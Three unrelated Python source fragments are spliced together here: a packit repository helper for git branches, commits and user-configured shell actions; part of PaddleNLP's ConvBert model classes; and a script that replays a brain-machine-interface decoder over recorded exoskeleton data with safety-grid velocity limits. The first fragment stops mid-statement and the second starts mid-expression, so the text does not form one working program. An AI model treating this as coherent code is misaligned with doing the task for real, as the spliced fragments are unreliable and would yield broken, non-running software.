# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import shlex
from logging import getLogger
from pathlib import Path
from typing import Optional, Callable, List, Tuple, Iterable, Dict
import git
from git import PushInfo
from packit.actions import ActionName
from packit.command_handler import RUN_COMMAND_HANDLER_MAPPING, CommandHandler
from packit.config import Config, RunCommandType
from packit.config.common_package_config import CommonPackageConfig
from packit.exceptions import PackitException
from packit.local_project import LocalProject
from packit.security import CommitVerifier
from packit.specfile import Specfile
from packit.utils import cwd
logger = getLogger(__name__)
class PackitRepositoryBase:
# mypy complains when this is a property
local_project: LocalProject
def __init__(self, config: Config, package_config: CommonPackageConfig) -> None:
"""
:param config: global configuration
:param package_config: configuration of the upstream project
"""
self.config = config
self.package_config = package_config
self._specfile_path: Optional[Path] = None
self._specfile: Optional[Specfile] = None
self.allowed_gpg_keys: Optional[List[str]] = None
self._handler_kls = None
self._command_handler: Optional[CommandHandler] = None
@property
def handler_kls(self):
if self._handler_kls is None:
logger.debug(f"Command handler: {self.config.command_handler}")
self._handler_kls = RUN_COMMAND_HANDLER_MAPPING[self.config.command_handler]
return self._handler_kls
@property
def command_handler(self) -> CommandHandler:
if self._command_handler is None:
self._command_handler = self.handler_kls(
local_project=self.local_project, config=self.config
)
return self._command_handler
def running_in_service(self) -> bool:
""" are we running in packit service? """
return self.command_handler.name == RunCommandType.sandcastle
@property
def absolute_specfile_dir(self) -> Path:
""" get dir where the spec file is"""
return Path(self.absolute_specfile_path).parent
@property
def absolute_specfile_path(self) -> Path:
if not self._specfile_path:
self._specfile_path = Path(self.local_project.working_dir).joinpath(
self.package_config.specfile_path
)
if not self._specfile_path.exists():
raise FileNotFoundError(f"Specfile {self._specfile_path} not found.")
return self._specfile_path
@property
def specfile(self) -> Specfile:
if self._specfile is None:
self._specfile = Specfile(
self.absolute_specfile_path, self.absolute_specfile_dir
)
return self._specfile
def create_branch(
self, branch_name: str, base: str = "HEAD", setup_tracking: bool = False
) -> git.Head:
"""
Create a new git branch in dist-git
:param branch_name: name of the branch to check out and fetch
:param base: we base our new branch on this one
:param setup_tracking: set up remote tracking
(exc will be raised if the branch is not in the remote)
:return the branch which was just created
"""
# it's not an error if the branch already exists
origin = self.local_project.git_repo.remote("origin")
if branch_name in self.local_project.git_repo.branches:
logger.debug(
f"It seems that branch {branch_name!r} already exists, checking it out."
)
head = self.local_project.git_repo.branches[branch_name]
else:
head = self.local_project.git_repo.create_head(branch_name, commit=base)
if setup_tracking:
if branch_name in origin.refs:
remote_ref = origin.refs[branch_name]
else:
raise PackitException(
f"Remote origin doesn't have ref {branch_name!r}."
)
# this is important to fedpkg: build can't find the tracking branch otherwise
head.set_tracking_branch(remote_ref)
return head
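# Hypothetical usage (the branch name is a placeholder, not taken from the source):
# head = self.create_branch("f34", base="HEAD", setup_tracking=True)
# head.checkout()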
def checkout_branch(self, git_ref: str):
"""
Perform a `git checkout`
:param git_ref: ref to check out
"""
if git_ref in self.local_project.git_repo.heads:
head = self.local_project.git_repo.heads[git_ref]
else:
raise PackitException(f"Branch {git_ref} does not exist")
head.checkout()
def commit(self, title: str, msg: str, prefix: str = "[packit] ") -> None:
"""
Perform `git add -A` and `git commit`
"""
logger.debug("About to add all & commit.")
main_msg = f"{prefix}{title}"
# add files to index in case some are untracked
# untracked files don't make a git repo dirty, unless they are staged
self.local_project.git_repo.git.add("-A")
if not self.local_project.git_repo.is_dirty():
raise PackitException(
"No changes are present in the dist-git repo: nothing to commit."
)
self.local_project.git_repo.index.write()
commit_args = ["-s", "-m", main_msg]
if msg:
commit_args += ["-m", msg]
# TODO: attach git note to every commit created
# TODO: implement cleaning policy: once the PR is closed (merged/refused), remove the branch
# make this configurable so that people know this would happen, don't clean by default
# we should likely clean only merged PRs by default
# TODO: implement signing properly: we need to create a cert for the bot,
# distribute it to the container, prepare git config and then we can start signing
# TODO: make -s configurable
self.local_project.git_repo.git.commit(*commit_args)
def run_action(self, actions: ActionName, method: Callable = None, *args, **kwargs):
"""
Run the method in the self._with_action block.
Usage:
> self._run_action(
> action_name="sync", method=dg.sync_files, upstream_project=up.local_project
> )
> # If user provided custom command for the `sync`, it will be used.
> # Otherwise, the method `dg.sync_files` will be used
> # with parameter `upstream_project=up.local_project`
>
> self._run_action(action_name="pre-sync")
> # This will be used as an optional hook
:param actions: ActionName enum (Name of the action that can be overwritten
in the package_config.actions)
:param method: method to run if the action was not defined by user
(if not specified, the action can be used for custom hooks)
:param args: args for the method
:param kwargs: kwargs for the method
"""
if not method:
logger.debug(f"Running {actions} hook.")
if self.with_action(action=actions):
if method:
method(*args, **kwargs)
def has_action(self, action: ActionName) -> bool:
"""
Is the action defined in the config?
"""
return action in self.package_config.actions
def get_commands_for_actions(self, action: ActionName) -> List[List[str]]:
"""
Parse any of the following config structures and return the commands as a list of lists.
I)
action_name: "one cmd"
II)
action_name:
- "one cmd""
III)
action_name:
- ["one", "cmd"]
Returns [["one", "cmd"]] for all of them.
:param action: str or list[str] or list[list[str]]
:return: list[list[str]]
"""
configured_action = self.package_config.actions[action]
if isinstance(configured_action, str):
configured_action = [configured_action]
if not isinstance(configured_action, list):
raise ValueError(
f"Expecting 'str' or 'list' as a command, got '{type(configured_action)}'. "
f"The value: {configured_action}"
)
parsed_commands = []
for cmd in configured_action:
if isinstance(cmd, str):
parsed_commands.append(shlex.split(cmd))
elif isinstance(cmd, list):
parsed_commands.append(cmd)
else:
raise ValueError(
f"Expecting 'str' or 'list' as a command, got '{type(cmd)}'. "
f"The value: {cmd}"
)
return parsed_commands
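# Illustration (hypothetical values, not from the source config): the three accepted
# shapes all parse to the same nested list --
#   "make build"          -> [["make", "build"]]
#   ["make build"]        -> [["make", "build"]]
#   [["make", "build"]]   -> [["make", "build"]]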
def with_action(self, action: ActionName, env: Optional[Dict] = None) -> bool:
"""
If the action is defined in the self.package_config.actions,
we run it and return False (so we can skip the if block)
If the action is not defined, return True.
Usage:
> if self._with_action(action_name="patch"):
> # Run default implementation
>
> # Custom command was run if defined in the config
Context manager is currently not possible without ugly hacks:
https://stackoverflow.com/questions/12594148/skipping-execution-of-with-block
https://www.python.org/dev/peps/pep-0377/ (rejected)
:param action: ActionName enum (Name of the action that can be overwritten
in the package_config.actions)
:param env: dict with env vars to set for the command
:return: True, if the action is not overwritten, False when custom command was run
"""
logger.debug(f"Running {action}.")
if action in self.package_config.actions:
commands_to_run = self.get_commands_for_actions(action)
logger.info(f"Using user-defined script for {action}: {commands_to_run}")
for cmd in commands_to_run:
self.command_handler.run_command(command=cmd, env=env, shell=True)
return False
logger.debug(f"Running default implementation for {action}.")
return True
def get_output_from_action(
self, action: ActionName, env: Optional[Dict] = None
) -> Optional[List[str]]:
"""
Run self.actions[action] command(s) and return their outputs.
"""
if action not in self.package_config.actions:
return None
commands_to_run = self.get_commands_for_actions(action)
outputs = []
logger.info(f"Using user-defined script for {action}: {commands_to_run}")
for cmd in commands_to_run:
outputs.append(
self.command_handler.run_command(
cmd, return_output=True, env=env, shell=True
)
)
logger.debug(f"Action command output: {outputs}")
return outputs
def specfile_add_patches(self, patch_list: List[Tuple[Path, str]]) -> None:
"""
Add the given list of (patch_name, msg) to the specfile.
:param patch_list: [(patch_name, msg)]
"""
if not patch_list:
return
self.specfile.remove_applied_patches()
self.specfile.add_patches(patch_list)
self.specfile.ensure_pnum()
self.local_project.git_repo.index.write()
def get_project_url_from_distgit_spec(self) -> Optional[str]:
"""
Parse spec file and return value of URL
"""
# consider using rebase-helper for this: SpecFile.download_remote_sources
sections = self.specfile.spec_content.sections
package_section: List[str] = sections.get("%package", [])
for s in package_section:
if s.startswith("URL:"):
url = s[4:].strip()
logger.debug(f"Upstream project URL: {url}")
return url
return None
def check_last_commit(self) -> None:
if self.allowed_gpg_keys is None:
logger.debug("Allowed | |
be equal to the shape of transpose input embeddings: {}".
format(
output_embeddings.weight.shape,
input_embeddings.weight.shape,
input_embeddings.weight.t().shape, ))
if getattr(output_embeddings, "bias", None) is not None:
if output_embeddings.weight.shape[
-1] != output_embeddings.bias.shape[0]:
raise ValueError(
"the weight lase shape: {} of output_embeddings is not equal to the bias shape: {}"
"please check output_embeddings configuration".format(
output_embeddings.weight.shape[-1],
output_embeddings.bias.shape[0], ))
@register_base_model
class ConvBertModel(ConvBertPretrainedModel):
"""
The bare ConvBert Model transformer outputting raw hidden-states.
This model inherits from :class:`~paddlenlp.transformers.model_utils.PretrainedModel`.
Refer to the superclass documentation for the generic methods.
This model is also a Paddle `paddle.nn.Layer <https://www.paddlepaddle.org.cn/documentation
/docs/en/api/paddle/fluid/dygraph/layers/Layer_en.html>`__ subclass. Use it as a regular Paddle Layer
and refer to the Paddle documentation for all matter related to general usage and behavior.
Args:
vocab_size (int):
Vocabulary size of `inputs_ids` in `ConvBertModel`. Also is the vocab size of token embedding matrix.
Defines the number of different tokens that can be represented by the `inputs_ids` passed when calling `ConvBertModel`.
embedding_size (int, optional):
Dimensionality of the embedding layer. Defaults to `768`.
hidden_size (int, optional):
Dimensionality of the encoder layer and pooler layer. Defaults to `768`.
num_hidden_layers (int, optional):
Number of hidden layers in the Transformer encoder. Defaults to `12`.
num_attention_heads (int, optional):
Number of attention heads for each attention layer in the Transformer encoder.
Defaults to `12`.
intermediate_size (int, optional):
Dimensionality of the feed-forward (ff) layer in the encoder. Input tensors
to ff layers are firstly projected from `hidden_size` to `intermediate_size`,
and then projected back to `hidden_size`. Typically `intermediate_size` is larger than `hidden_size`.
Defaults to `3072`.
hidden_act (str, optional):
The non-linear activation function in the feed-forward layer.
``"gelu"``, ``"relu"`` and any other paddle supported activation functions
are supported. Defaults to `"gelu"`.
hidden_dropout_prob (float, optional):
The dropout probability for all fully connected layers in the embeddings and encoder.
Defaults to `0.1`.
attention_probs_dropout_prob (float, optional):
The dropout probability used in MultiHeadAttention in all encoder layers to drop some attention target.
Defaults to `0.1`.
max_position_embeddings (int, optional):
The maximum value of the dimensionality of position encoding, which dictates the maximum supported length of an input
sequence. Defaults to `512`.
type_vocab_size (int, optional):
The vocabulary size of `token_type_ids`.
Defaults to `2`.
initializer_range (float, optional):
The standard deviation of the normal initializer.
Defaults to 0.02.
.. note::
A normal_initializer initializes weight matrices as normal distributions.
See :meth:`ConvBertPretrainedModel.init_weights()` for how weights are initialized in `ConvBertModel`.
pad_token_id (int, optional):
The index of padding token in the token vocabulary.
Defaults to `0`.
conv_kernel_size (int, optional):
The size of the convolutional kernel.
Defaults to `9`.
head_ratio (int, optional):
Ratio gamma to reduce the number of attention heads.
Defaults to `2`.
num_groups (int, optional):
The number of groups for grouped linear layers for ConvBert model.
Defaults to `1`.
"""
def __init__(self,
vocab_size,
embedding_size=768,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
pad_token_id=0,
conv_kernel_size=9,
head_ratio=2,
num_groups=1):
super(ConvBertModel, self).__init__()
self.pad_token_id = pad_token_id
self.initializer_range = initializer_range
self.embeddings = ConvBertEmbeddings(
vocab_size,
embedding_size,
hidden_dropout_prob,
max_position_embeddings,
type_vocab_size, )
if embedding_size != hidden_size:
self.embeddings_project = nn.Linear(embedding_size, hidden_size)
encoder_layer = TransformerEncoderLayerWithConv(
hidden_size,
num_attention_heads,
intermediate_size,
dropout=hidden_dropout_prob,
activation=hidden_act,
attn_dropout=attention_probs_dropout_prob,
act_dropout=0,
conv_kernel_size=conv_kernel_size,
head_ratio=head_ratio,
num_groups=num_groups, )
self.encoder = nn.TransformerEncoder(encoder_layer, num_hidden_layers)
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def forward(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
r'''
The ConvBertModel forward method, overrides the `__call__()` special method.
Args:
input_ids (Tensor):
Indices of input sequence tokens in the vocabulary. They are
numerical representations of tokens that build the input sequence.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
token_type_ids (Tensor, optional):
Segment token indices to indicate different portions of the inputs.
Selected in the range ``[0, type_vocab_size - 1]``.
If `type_vocab_size` is 2, which means the inputs have two portions.
Indices can either be 0 or 1:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
Defaults to `None`, which means we don't add segment embeddings.
position_ids(Tensor, optional):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
max_position_embeddings - 1]``.
Shape as `(batch_size, num_tokens)` and dtype as int64. Defaults to `None`.
attention_mask (Tensor, optional):
Mask used in multi-head attention to avoid performing attention on to some unwanted positions,
usually the paddings or the subsequent positions.
Its data type can be int, float and bool.
If its data type is int, the values should be either 0 or 1.
- **1** for tokens that are **not masked**,
- **0** for tokens that are **masked**.
It is a tensor with shape broadcasted to `[batch_size, num_attention_heads, sequence_length, sequence_length]`.
Defaults to `None`, which means no positions are prevented from being attended to.
Returns:
Tensor: Returns Tensor `sequence_output`, sequence of hidden-states at the last layer of the model.
Shape as `[batch_size, sequence_length, hidden_size]` and dtype as float32.
Example:
.. code-block::
import paddle
from paddlenlp.transformers import ConvBertModel, ConvBertTokenizer
tokenizer = ConvBertTokenizer.from_pretrained('convbert-base')
model = ConvBertModel.from_pretrained('convbert-base')
inputs = tokenizer("Welcome to use PaddlePaddle and PaddleNLP!")
inputs = {k:paddle.to_tensor([v]) for (k, v) in inputs.items()}
output = model(**inputs)
'''
if attention_mask is None:
attention_mask = paddle.unsqueeze(
(input_ids == self.pad_token_id).astype(dtype_float) * -1e9,
axis=[1, 2])
else:
attention_mask = paddle.unsqueeze(
attention_mask, axis=[1, 2]).astype(dtype_float)
attention_mask = (1.0 - attention_mask) * -1e9
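# Note (added comment): the mask built above is additive -- positions that may be
# attended to contribute 0, padded/masked positions contribute -1e9, so they
# effectively vanish after the attention softmax.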
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids, )
if hasattr(self, "embeddings_project"):
embedding_output = self.embeddings_project(embedding_output)
sequence_output = self.encoder(embedding_output, attention_mask)
return sequence_output
class ConvBertDiscriminator(ConvBertPretrainedModel):
"""
ConvBert Model with a discriminator prediction head on top.
Args:
convbert (:class:`ConvBertModel`):
An instance of ConvBertModel.
"""
def __init__(self, convbert):
super(ConvBertDiscriminator, self).__init__()
self.convbert = convbert
self.discriminator_predictions = ConvBertDiscriminatorPredictions(
self.convbert.config["hidden_size"],
self.convbert.config["hidden_act"])
self.init_weights()
def forward(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
r'''
The ConvBertDiscriminator forward method, overrides the `__call__()` special method.
Args:
input_ids (Tensor):
Indices of input sequence tokens in the vocabulary. They are
numerical representations of tokens that build the input sequence.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
token_type_ids (Tensor, optional):
Segment token indices to indicate different portions of the inputs.
Selected in the range ``[0, type_vocab_size - 1]``.
If `type_vocab_size` is 2, which means the inputs have two portions.
Indices can either be 0 or 1:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
Defaults to `None`, which means we don't add segment embeddings.
position_ids(Tensor, optional):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
max_position_embeddings - 1]``.
Shape as `(batch_size, num_tokens)` and dtype as int64. Defaults to `None`.
attention_mask (Tensor, optional):
Mask used in multi-head attention to avoid performing attention on to some unwanted positions,
usually the paddings or the subsequent positions.
Its data type can be int, float and bool.
If its data type is int, the values should be either 0 or 1.
- **1** for tokens that are **not masked**,
- **0** for tokens that are **masked**.
It is a tensor with shape broadcasted to `[batch_size, num_attention_heads, sequence_length, sequence_length]`.
Defaults to `None`, which means no positions are prevented from being attended to.
Returns:
Tensor: Returns tensor `logits`, a tensor of the discriminator prediction logits.
Shape as `[batch_size, sequence_length]` and dtype as float32.
Example:
.. code-block::
import paddle
from paddlenlp.transformers import ConvBertDiscriminator, ConvBertTokenizer
tokenizer = ConvBertTokenizer.from_pretrained('convbert-base')
model = ConvBertDiscriminator.from_pretrained('convbert-base')
inputs = tokenizer("Welcome to use PaddlePaddle and PaddleNLP!")
inputs = {k:paddle.to_tensor([v]) for (k, v) in inputs.items()}
logits = model(**inputs)
'''
discriminator_sequence_output = self.convbert(
input_ids, token_type_ids, position_ids, attention_mask)
logits = self.discriminator_predictions(discriminator_sequence_output)
return logits
class ConvBertGenerator(ConvBertPretrainedModel):
"""
ConvBert Model with a generator prediction head on top.
Args:
convbert (:class:`ConvBertModel`):
An instance of ConvBertModel.
"""
def __init__(self, convbert):
super(ConvBertGenerator, self).__init__()
self.convbert = convbert
self.generator_predictions = ConvBertGeneratorPredictions(
self.convbert.config["embedding_size"],
self.convbert.config["hidden_size"],
self.convbert.config["hidden_act"], )
if not self.tie_word_embeddings:
self.generator_lm_head = nn.Linear(
self.convbert.config["embedding_size"],
self.convbert.config["vocab_size"])
else:
self.generator_lm_head_bias = paddle.create_parameter(
shape=[self.convbert.config["vocab_size"]],
dtype=dtype_float,
is_bias=True, )
self.init_weights()
def get_input_embeddings(self):
return self.convbert.embeddings.word_embeddings
def forward(
self,
input_ids=None,
token_type_ids=None,
position_ids=None,
attention_mask=None, ):
r'''
The ConvBertGenerator forward method, overrides the `__call__()` special method.
| |
import numpy as np
import pickle
from riglib.filter import Filter
from riglib.bmi.goal_calculators import ZeroVelocityGoal_ismore
from scipy.signal import butter,lfilter
from ismore import ismore_bmi_lib
import tables
from ismore.invasive.make_global_armassist_hull import global_hull
# Path:
# 7742 -- constant assist (xy = 0, ang = 0.1)
class RerunDecoding(object):
def __init__(self, hdf_file, decoder_file, safety_grid_file, xy_assist,
ang_assist, attractor_speed):
hdf = tables.openFile(hdf_file)
self.plant_pos = hdf.root.task[:]['plant_pos']
self.plant_vel = hdf.root.task[:]['plant_vel']
self.target = hdf.root.task[:]['target_pos']
spike_counts = hdf.root.task[:]['spike_counts']
self.spike_counts = np.array(spike_counts, dtype=np.float64)
self.internal_state = hdf.root.task[:]['internal_decoder_state']
self.decoder_state = hdf.root.task[:]['decoder_state']
self.raw_command = hdf.root.task[:]['command_vel_raw']
self.pre_safe_command = hdf.root.task[:]['command_vel_sent_pre_safety']
self.proc_command = hdf.root.task[:]['command_vel_sent']
self.pre_drive_state = hdf.root.task[:]['pre_drive_state']
self.state_list = hdf.root.task_msgs[:]
self.dec = pickle.load(open(decoder_file))
self.drives_neurons = self.dec.drives_neurons;
self.drives_neurons_ix0 = np.nonzero(self.drives_neurons)[0][0]
self.update_bmi_ix = np.nonzero(np.diff(np.squeeze(self.internal_state[:, self.drives_neurons_ix0, 0])))[0]+1
self.xy_assist = hdf.root.task[:]['xy_assist_level']
self.ang_assist = hdf.root.task[:]['ang_assist_level']
self.hdf = hdf
self.safety_grid = pickle.load(open(safety_grid_file))
#hdf_global = tables.openFile('/Users/preeyakhanna/Dropbox/Carmena_Lab/SpainBMI/ismore_analysis/data/hud120171010_72_te7721.hdf')
#pts = hdf_global.root.task[:]['plant_pos'][:, [0, 1, 2]]
#self.safety_grid.global_hull.hull_xy._points = pts[:, [0, 1]]
#self.safety_grid.global_hull.hull3d._points = pts
#self.safety_grid.global_hull.hull_xy.simplices = self.safety_grid.global_hull.hull_xy.vertices.copy()
#self.safety_grid.global_hull.hull3d.simplices = self.safety_grid.global_hull.hull3d.vertices.copy()
fs_synch = 20
nyq = 0.5 * fs_synch
cutoff_freq = 5 / nyq
bpf_kin_coeffs = butter(4, cutoff_freq, btype='low')
self.accel_lim_armassist = np.inf
self.accel_lim_psi = np.inf
self.accel_lim_rehand = np.inf
self.command_lpfs = dict()
for state in ['aa_vx', 'aa_vy', 'aa_vpsi','rh_vthumb', 'rh_vindex', 'rh_vfing3', 'rh_vprono']:
self.command_lpfs[state] = Filter(bpf_kin_coeffs[0], bpf_kin_coeffs[1]) # low-pass filter to smooth out command velocities
self.target = hdf.root.task[:]['target_pos']
self.goal_calculator = ZeroVelocityGoal_ismore(ismore_bmi_lib.SSM_CLS_DICT['IsMore'],
pause_states = ['rest', 'wait', 'instruct_rest', 'instruct_trial_type'])
asst_kwargs = {
'call_rate': 20,
'xy_cutoff': 3,
'speed': 'high',
}
self.assister = ismore_bmi_lib.LFC_GO_TO_START_ASSISTER_CLS_DICT['IsMore'](**asst_kwargs)
self.assist_level = np.array([xy_assist, ang_assist])
self.rh_pfings = [[0, 'rh_pthumb'], [1, 'rh_pindex'], [2, 'rh_pfing3']]
self.spike_counts = hdf.root.task[:]['spike_counts'][:, :, 0]
self.attractor_speed = attractor_speed
def run_decoder(self):
'''
Summary: re-run the decoder's 'predict' method over the recorded spike counts
(self.spike_counts, iterations x units) and rebuild the raw, pre-safety and
sent velocity commands for comparison against the values logged in the HDF file.
'''
spike_counts = self.spike_counts
T = spike_counts.shape[0]
decoded_state = []
spike_accum = np.zeros_like(spike_counts[0,:])
dec_last = np.zeros_like(self.dec.predict(spike_counts[0,:]))
self.prev_vel_bl_aa = np.zeros((3, ))*np.nan
self.prev_vel_bl_rh = np.zeros((4, ))*np.nan
tot_spike_accum = np.zeros_like(spike_counts[0,:])-1
self.dec.filt._init_state()
self.state = 'wait'
self.sent_vel = [np.zeros((7, ))]
self.raw_vel = [np.zeros((7, ))]
self.pre_safe_vel = [np.zeros((7, ))]
self.raw_pos = [np.zeros((7, ))]
for t in range(T):
spike_accum = spike_accum+spike_counts[t,:]
if t in self.state_list[:]['time']:
ix = np.nonzero(self.state_list[:]['time']==t)[0]
self.state = self.state_list[ix[-1]]['msg']
if t in self.update_bmi_ix:
# Assister
target_state = self.get_target_BMI_state(self.plant_pos[t-1, :], self.plant_vel[t-1, :], self.target[t, :])
current_state = np.hstack((self.plant_pos[t-1, :], self.plant_vel[t-1, :], [1]))
assist_kwargs = self.assister(current_state, target_state[:,0].reshape(-1,1),
self.assist_level, mode=self.state)
#
if self.dec.zscore == True:
spike_accum = (spike_accum - self.dec.mFR)/self.dec.sdFR
spike_accum[np.isnan(spike_accum)] = 0
# Call decoder
dec_new = self.dec.predict(spike_accum, **assist_kwargs)
spike_accum = np.zeros_like(spike_counts[0,:])
else:
dec_new = self.dec.get_state()
vel_bl = dec_new[7:14]
if np.any(np.isnan(vel_bl)):
vel_bl[np.isnan(vel_bl)] = 0
self.dec.filt.state.mean[7:14, 0] = np.mat(vel_bl.copy()).T
self.raw_vel.append(vel_bl.copy())
self.raw_pos.append(dec_new[:7])
v = vel_bl.copy()
vel_post_drive = self.ismore_plant_drive(v, t)
# Send imaginary velocity command
# Set decoder['q'] to plant pos:
self.dec['q'] = self.plant_pos[t]
self.sent_vel.append(vel_post_drive)
self.raw_vel = np.vstack((self.raw_vel))
self.sent_vel = np.vstack((self.sent_vel))
self.raw_pos = np.vstack((self.raw_pos))
self.pre_safe_vel = np.vstack((self.pre_safe_vel))
def ismore_plant_drive(self, vel_bl, t):
current_state = self.pre_drive_state[t, :]
### Velocity processing in plants.drive ###
vel_bl_aa = vel_bl[0:3]
vel_bl_rh = vel_bl[3:7]
### Accel Limit Velocitites ###
### Accel Limit Velocitites ###
### Accel Limit Velocitites ###
if not np.all(np.isnan(np.hstack((self.prev_vel_bl_aa, self.prev_vel_bl_rh)))):
aa_output_accel = vel_bl_aa - self.prev_vel_bl_aa
rh_output_accel = vel_bl_rh - self.prev_vel_bl_rh
### AA XY ###
for i in np.arange(2):
if aa_output_accel[i] > self.accel_lim_armassist:
vel_bl_aa[i] = self.prev_vel_bl_aa[i] + self.accel_lim_armassist
elif aa_output_accel[i] < -1*self.accel_lim_armassist:
vel_bl_aa[i] = self.prev_vel_bl_aa[i] - self.accel_lim_armassist
### AA PSI ###
if aa_output_accel[2] > self.accel_lim_psi:
vel_bl_aa[2] = self.prev_vel_bl_aa[2] + self.accel_lim_psi
elif aa_output_accel[2] < -1*self.accel_lim_psi:
vel_bl_aa[2] = self.prev_vel_bl_aa[2] - self.accel_lim_psi
### RH All ###
for i in np.arange(4):
if rh_output_accel[i] > self.accel_lim_rehand:
vel_bl_rh[i] = self.prev_vel_bl_rh[i] + self.accel_lim_rehand
elif rh_output_accel[i] < -1*self.accel_lim_rehand:
vel_bl_rh[i] = self.prev_vel_bl_rh[i] - self.accel_lim_rehand
### LPF Filter Velocities ###
### LPF Filter Velocities ###
### LPF Filter Velocities ###
for s, state in enumerate(['aa_vx', 'aa_vy', 'aa_vpsi']):
tmp = vel_bl_aa[s].copy()
vel_bl_aa[s] = self.command_lpfs[state](tmp)
if np.isnan(vel_bl_aa[s]):
vel_bl_aa[s] = 0
for s, state in enumerate(['rh_vthumb', 'rh_vindex', 'rh_vfing3', 'rh_vprono']):
tmp = vel_bl_rh[s].copy()
vel_bl_rh[s] = self.command_lpfs[state](tmp)
if np.isnan(vel_bl_rh[s]):
vel_bl_rh[s] = 0
#If the next position is outside of safety then damp velocity to only go to limit:
self.pre_safe_vel.append(np.hstack((vel_bl_aa, vel_bl_rh)))
pos_pred = current_state + 0.05*np.hstack((vel_bl_aa, vel_bl_rh))
pos_pred_aa = pos_pred[0:3]
pos_pred_rh = pos_pred[3:7]
#Make sure predicted AA PX, AA PY within bounds:
xy_change = True
x_tmp = self.safety_grid.is_valid_pos(pos_pred_aa[[0, 1]])
if x_tmp == False:
#d_pred = np.linalg.norm(self.safety_grid.interior_pos - pos_pred_aa[[0, 1]])
#d_curr = np.linalg.norm(self.safety_grid.interior_pos - self.plant_pos[t-1, [0, 1]])
# if d_pred < d_curr:
# xy_change = True
# else:
# xy_change = False
# vel_bl_aa[[0, 1]] = 0
current_pos = current_state[[0, 1]]
d_to_valid, pos_valid = self.safety_grid.dist_to_valid_point(current_pos)
vel_bl_aa[[0, 1]] = self.attractor_speed*(pos_valid - current_pos)/0.05
pos_pred_aa[[0, 1]] = current_pos + 0.05*vel_bl_aa[[0, 1]]
#print 'plant adjust: ', vel_bl_aa[self.aa_plant.aa_xy_ix], pos_pred_aa[self.aa_plant.aa_xy_ix]
xy_change = True
# Make sure AA Psi within bounds:
# If X/Y ok
if xy_change:
mn, mx = self.safety_grid.get_minmax_psi(pos_pred_aa[[0, 1]])
predx, predy, predpsi = pos_pred_aa[[0, 1, 2]]
# If x/y not ok:
else:
mn, mx = self.safety_grid.get_minmax_psi(self.plant_pos[t-1, [0, 1]])
predx, predy, predpsi = self.plant_pos[t-1, [0, 1, 2]]
# Set psi velocity :
psi_ok = False
if np.logical_and(pos_pred_aa[2] >= mn, pos_pred_aa[2] <= mx):
# Test if globally ok:
global_ok = self.safety_grid.global_hull.hull3d.find_simplex(np.array([predx, predy, pos_pred_aa[2]]))
if global_ok:
psi_ok = True
if psi_ok == False:
vel_bl_aa[2] = 0
#print 'stop psi vel: ', mn, mx, pos_pred_aa[self.aa_plant.aa_psi_ix]
# Make sure RH Prono within bounds (if SSM is only RH, use settings.starting_pos for AAPX, AAPY)
# If X/Y ok
if xy_change:
mn, mx = self.safety_grid.get_minmax_prono(pos_pred_aa[[0, 1]])
# If x/y not ok, or not moving because not part of the state space:
else:
mn, mx = self.safety_grid.get_minmax_prono(self.plant_pos[t-1, [0, 1]])
# Set prono velocity :
if np.logical_and(pos_pred_rh[3] >= mn, pos_pred_rh[3] <= mx):
pass
else:
tmp_pos = pos_pred_rh[3]
if tmp_pos < mn:
tmp = self.attractor_speed*(mn - tmp_pos)/0.05
elif tmp_pos > mx:
tmp = self.attractor_speed*(mx - tmp_pos)/0.05
else:
tmp = 0
vel_bl_rh[3] = tmp
# Assure RH fingers are within range:
for i, (ix, nm) in enumerate(self.rh_pfings):
mn, mx = self.safety_grid.get_rh_minmax(nm)
if np.logical_and(pos_pred_rh[ix] >= mn, pos_pred_rh[ix] <= mx):
pass
else:
if pos_pred_rh[ix] > mx:
tmp = self.attractor_speed*(mx - pos_pred_rh[ix])/0.05
elif pos_pred_rh[ix] < mn:
tmp = self.attractor_speed*(mn - pos_pred_rh[ix])/0.05
else:
tmp = 0
vel_bl_rh[ix] = tmp
return np.hstack((vel_bl_aa, vel_bl_rh))
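# Summary note (added for clarity, not from the source): the command is processed in
# order -- acceleration limiting (a no-op here since the limits are np.inf), per-axis
# low-pass filtering, then safety checks on the 0.05 s position prediction: XY is
# redirected toward the nearest valid grid point, psi is zeroed when outside its
# allowed range or the global hull, and prono/finger joints are pulled back toward
# their limits at a rate scaled by attractor_speed.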
def get_target_BMI_state(self, plant_pos, plant_vel, targ_pos, *args):
'''Run the goal calculator to determine the current target state.'''
current_state = np.hstack([plant_pos, plant_vel, 1])[:, None]
if np.any(np.isnan(current_state)):
current_state[np.isnan(current_state)] = 0
data, solution_updated = self.goal_calculator(targ_pos, self.state,
**dict(current_state=current_state))
target_state = data[0].reshape(-1, 1)
if np.any(np.isnan(target_state)):
target_state[np.isnan(target_state)] = 0
#target_state = np.hstack(( self.target_pos.values, [1]))
#target_state = target_state.reshape(-1, 1)
return np.tile(np.array(target_state).reshape(-1, 1), [1, self.dec.n_subbins])
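# Hypothetical usage sketch (file paths and parameter values below are placeholders,
# not taken from the source):
# R = RerunDecoding('session.hdf', 'decoder.pkl', 'safety_grid.pkl',
#                   xy_assist=0., ang_assist=0.1, attractor_speed=0.05)
# R.run_decoder()
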